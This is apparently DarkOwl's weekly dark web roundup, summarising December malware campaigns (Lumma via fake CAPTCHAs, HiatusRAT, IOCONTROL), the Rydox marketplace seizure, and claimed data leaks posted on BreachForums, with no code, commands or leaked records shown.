Deep and Dark Web Round Up
Weekly Highlights
Malvertising Campaign Distributes Lumma Malware Via Fake CAPTCHAs
FBI Warns of HiatusRAT Malware Attacks Targeting Web Cameras and DVRs
DOJ Announces Seizure of Rydox and Arrest of Administrators
Iran-Affiliated Threat Actors Target U.S. and Israel with IOCONTROL Malware
Malware/Ransomware
Malvertising Campaign Distributes Lumma Malware Via Fake CAPTCHAs
Researchers at GuardioLabs have identified a malvertising campaign distributing the Lumma infostealer malware using fake CAPTCHAs. As detailed in the firm’s findings, a seemingly legitimate CAPTCHA page appears unexpectedly while browsing a site. Upon completing the CAPTCHA, however, a PowerShell command is pasted and executed by the victim which results in the installation of Lumma. Based on an analysis of DNS fingerprints, server IPs, and locations, GuardioLabs linked the activity to the threat actor Vane Viper.
FBI Warns of HiatusRAT Malware Attacks Targeting Web Cameras and DVRs
In a December 16 Private Industry Notification (PIN), the Federal Bureau of Investigation (FBI) warned of HiatusRAT actors targeting Chinese-branded web cameras and DVRs. HiatusRAT—a Remote Access Trojan (RAT) used by threat actors to remotely gain control of a device—has focused on targeting devices waiting for security patches. This malicious activity was observed in March 2024, when the threat actors carried out a scanning campaign targeting Internet of Things (IoT) devices in several countries, including the U.S.
Threat Actor Activity
DOJ Announces Seizure of Rydox and Arrest of Administrators
In a December 12 press release, the U.S. Department of Justice (DOJ) announced the seizure of Rydox, an illicit, online marketplace known for selling “stolen personal information, access devices, and other tools for carrying out cybercrime and fraud.” The press release also revealed the arrest of three Kosovo nations for serving as Rydox’s administrators. Two of the administrators were arrested in Kosovo while the third was arrested in Albania.
Iran-Affiliated Threat Actors Target U.S. and Israel with IOCONTROL Malware
Researchers have linked Iranian-affiliated threat actors to IOCONTROL, a new custom malware primarily targeting IoT and operational technology (OT) in Israel and the United States. As highlighted by the cybersecurity firm Claroty, IOCONTROL has been observed targeting “IP cameras, routers, programmable logic controllers (PLCs), human-machine interfaces (HMIs), firewalls, and other Linux-based IoT/OT platforms. Impacted vendors have included “Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, [and] Unitronics.”
Notable Leaks and Breaches
Autodr[.]it
On December 15, a threat actor on BreachForums claimed to have leaked data from the Italian website autodr[.]it, which specializes in selling used cars. Based on sample data included in the post, the leaked data appears to include IDs, telephone numbers, full names, email addresses, and more.
Maxxecom
On December 17, a threat actor on BreachForums claimed to have leaked data from Maxxecom[.]com, a “fully automated B2B e-commerce solution provider.” According to the post, the leak dates from March 2024 and includes over 1.8 million customer records. Exposed data includes “ID, order ID, eBay order ID, transaction details, item titles and SKUs, shipment tracking, buyer names, buyer emails, shipping addresses, phone numbers, payment methods, order statuses, invoices, vendor details, and timestamps.”
RM Group of Education
On December 17, a threat actor on BreachForums claimed to have leaked data from RM Group of Education, “India's leading educational Counsellor/Advisor, providing expert services for MBBS Admission in India and abroad.” Exposed data including contacts, complaints, admins, billings, addresses, wallets, WhatsApp details, and more.
SERECI
On December 17, a threat actor on BreachForums claimed to have leaked data from SERECI (Servicio de Registro Civico Nacional), “an entity that registers birth, marriage, and death certificates of all citizens of Bolivia.” As of December 17, the threat actor has only updated a portion of the records but has claimed that they will share all records in the near future. There is reportedly a total of 79,284 citizen records.
Suggested Further Reading
New Android NoviSpy spyware linked to Qualcomm zero-day bugs
Germany Disrupts BADBOX Malware on 30,000 Devices Using Sinkhole Action
FTC warns of online task job scams hooking victims like gambling
CISA orders federal agencies to secure Microsoft 365 tenants
Attackers Exploit Microsoft Teams and AnyDesk to Deploy DarkGate Malware
Ireland fines Meta $264 million over 2018 Facebook data breach
Hackers Use Microsoft MSC Files to Deploy Obfuscated Backdoor in Pakistan Attacks
Bitter APT Targets Turkish Defense Sector with WmRAT and MiyaRAT Malware
The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal
About DarkOwl
DarkOwl uses machine learning to collect automatically, continuously, and anonymously, index and rank darknet, deep web, and high-risk surface net data that allows for simplicity in searching.
Our platform collects and stores data in near real-time, allowing darknet sites that frequently change location and availability, be queried in a safe and secure manner without having to access the darknet itself.
DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. As importantly, DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. Our passion, our focus, and our expertise is the darknet.
For more information, visit www.darkowl.com.